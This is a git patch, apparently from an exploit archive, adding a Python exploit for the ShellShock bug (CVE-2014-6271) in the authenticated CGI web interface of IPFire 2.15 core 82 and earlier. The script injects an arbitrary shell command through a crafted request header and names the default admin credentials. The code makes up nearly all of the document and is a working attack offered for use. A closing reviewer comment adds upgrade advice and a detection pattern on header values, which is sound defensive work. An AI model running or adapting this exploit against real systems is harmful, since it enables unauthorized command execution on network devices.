From 63098d36da34af61b16b4c70caa4dd36eb8c82df Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Mon, 6 Oct 2014 04:44:51 +0000
Subject: [PATCH] Updated 10_06_2014
---
 files.csv | 1 +
 platforms/cgi/webapps/34839.py | 146 +++++++++++++++++++++++++++++++++
 2 files changed, 147 insertions(+)
 create mode 100755 platforms/cgi/webapps/34839.py
diff --git a/files.csv b/files.csv
index b8189da05..56f381afb 100755
--- a/files.csv
+++ b/files.csv
@@ -31367,6 +31367,7 @@ id,file,description,date,author,platform,type,port
 34836,platforms/windows/remote/34836.py,"Notepad++ 5.8.2 'libtidy.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-12,anT!-Tr0J4n,windows,remote,0
 34837,platforms/php/webapps/34837.txt,"Joomla! 'com_jstore' Component 'controller' Parameter Local File Include Vulnerability",2010-10-13,jos_ali_joe,php,webapps,0
 34838,platforms/windows/remote/34838.c,"Torrent DVD Creator 'quserex.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-13,anT!-Tr0J4n,windows,remote,0
+34839,platforms/cgi/webapps/34839.py,"IPFire Cgi Web Interface Authenticated Bash Environment Variable Code Injection exploit",2014-10-01,"Claudio Viviani",cgi,webapps,0
 34840,platforms/php/webapps/34840.txt,"Ronny CMS 1.1 r935 Multiple HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",php,webapps,0
 34841,platforms/php/webapps/34841.txt,"PluXml 5.0.1 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",php,webapps,0
 34842,platforms/php/webapps/34842.txt,"TWiki <= 5.0 bin/view rev Parameter XSS",2010-10-14,"DOUHINE Davy",php,webapps,0
diff --git a/platforms/cgi/webapps/34839.py b/platforms/cgi/webapps/34839.py
new file mode 100755
index 000000000..152458ad3
--- /dev/null
+++ b/platforms/cgi/webapps/34839.py
@@ -0,0 +1,146 @@
+#!/usr/bin/env python
+#
+# Exploit Title : IPFire <= 2.15 core 82 Authenticated cgi Remote Command Injection (ShellShock)
+#
+# Exploit Author : Claudio Viviani
+#
+# Vendor Homepage : http://www.ipfire.org
+#
+# Software Link: http://downloads.ipfire.org/releases/ipfire-2.x/2.15-core82/ipfire-2.15.i586-full-core82.iso
+#
+# Date : 2014-09-29
+#
+# Fixed version: IPFire 2.15 core 83 (2014-09-28)
+#
+# Info: IPFire is a free Linux distribution which acts as a router and firewall in the first instance.
+# It can be maintained via a web interface.
+# The distribution furthermore offers selected server-daemons and can easily be expanded to a SOHO-server.
+# IPFire is based on Linux From Scratch and is, like the Endian Firewall, originally a fork from IPCop.
+#
+# Vulnerability: IPFire <= 2.15 core 82 Cgi Web Interface suffers from Authenticated Bash Environment Variable Code Injection
+# (CVE-2014-6271)
+#
+# Suggestion:
+#
+# If you can't update the distro and you have installed ipfire via image files (Arm, Flash)
+# make sure to change the default access permission to graphical user interface (user:admin pass:ipfire)
+#
+#
+# http connection
+import urllib2
+# Basic Auth management Base64
+import base64
+# Args management
+import optparse
+# Error management
+import sys
+
+banner = """
+ ___ _______ _______ __ _______ __
+ | | _ | _ |__.----.-----. | _ .-----|__|
+ |. |. 1 |. 1___| | _| -__| |. 1___| _ | |
+ |. |. ____|. __) |__|__| |_____| |. |___|___ |__|
+ |: |: | |: | |: 1 |_____|
+ |::.|::.| |::.| |::.. . |
+ `---`---' `---' `-------'
+ _______ __ __ __ _______ __ __
+ | _ | |--.-----| | | _ | |--.-----.----| |--.
+ | 1___| | -__| | | 1___| | _ | __| <
+ |____ |__|__|_____|__|__|____ |__|__|_____|____|__|__|
+ |: 1 | |: 1 |
+ |::.. . | |::.. .
|
+ `-------' `-------'
+
+ IPFire <= 2.15 c0re 82 Authenticated
+ Cgi Sh3llSh0ck r3m0t3 C0mm4nd Inj3ct10n
+
+ Written by:
+
+ Claudio Viviani
+
+ http://www.homelab.it
+
+ info@homelab.it
+ homelabit@protonmail.ch
+
+ https://www.facebook.com/homelabit
+ https://twitter.com/homelabit
+ https://plus.google.com/+HomelabIt1/
+ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
+"""
+
+# Check url
+def checkurl(url):
+ if url[:8] != "https://" and url[:7] != "http://":
+ print('[X] You must insert http:// or https:// procotol')
+ sys.exit(1)
+ else:
+ return url
+
+def connectionScan(url,user,pwd,cmd):
+ print '[+] Connection in progress...'
+ try:
+ response = urllib2.Request(url)
+ content = urllib2.urlopen(response)
+ print '[X] IPFire Basic Authentication not found'
+ except urllib2.HTTPError, e:
+ if e.code == 404:
+ print '[X] Page not found'
+ elif e.code == 401:
+ try:
+ print '[+] Authentication in progress...'
+ base64string = base64.encodestring('%s:%s' % (user, pwd)).replace('\n', '')
+ headers = {'VULN' : '() { :;}; echo "H0m3l4b1t"; /bin/bash -c "'+cmd+'"' }
+ response = urllib2.Request(url, None, headers)
+ response.add_header("Authorization", "Basic %s" % base64string)
+ content = urllib2.urlopen(response).read()
+ if "ipfire" in content:
+ print '[+] Username & Password: OK'
+ print '[+] Checking for vulnerability...'
+ if 'H0m3l4b1t' in content:
+ print '[!] Command "'+cmd+'": INJECTED!'
+ else:
+ print '[X] Not Vulnerable :('
+ else:
+ print '[X] No IPFire page found'
+ except urllib2.HTTPError, e:
+ if e.code == 401:
+ print '[X] Wrong username or password'
+ else:
+ print '[X] HTTP Error: '+str(e.code)
+ except urllib2.URLError:
+ print '[X] Connection Error'
+ else:
+ print '[X] HTTP Error: '+str(e.code)
+ except urllib2.URLError:
+ print '[X] Connection Error'
+
+commandList = optparse.OptionParser('usage: %prog -t https://target:444/ -u admin -p pwd -c "touch /tmp/test.txt"')
+commandList.add_option('-t', '--target', action="store",
+ help="Insert TARGET URL",
+ )
+commandList.add_option('-c', '--cmd', action="store",
+ help="Insert command name",
+ )
+commandList.add_option('-u', '--user', action="store",
+ help="Insert username",
+ )
+commandList.add_option('-p', '--pwd', action="store",
+ help="Insert password",
+ )
+options, remainder = commandList.parse_args()
+
+# Check args
+if not options.target or not options.cmd or not options.user or not options.pwd:
+ print(banner)
+ commandList.print_help()
+ sys.exit(1)
+
+print(banner)
+
+url = checkurl(options.target)
+cmd = options.cmd
+user = options.user
+pwd = options.pwd
+
+connectionScan(url,user,pwd,cmd)
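Review bot: The "Suggestion" block in the header comment of the new 34839.py gives defenders only the default-password advice and reads as if that were a fix. The injection comes from bash parsing a function definition out of a request header (CVE-2014-6271), so an account with any password still reaches it until the box runs core 83, which the "Fixed version" line already names. I would extend that block with `# Remediation: upgrade to IPFire 2.15 core 83 or later; changing admin:ipfire only limits who can reach the CGI` and `# Detection: match logs/IDS on any HTTP request header value beginning with "() {"`. The script sends that value in a header it names `VULN`, so a rule keyed on a header name would miss it; the match belongs on the value, presumably for every header the CGI exports to the environment.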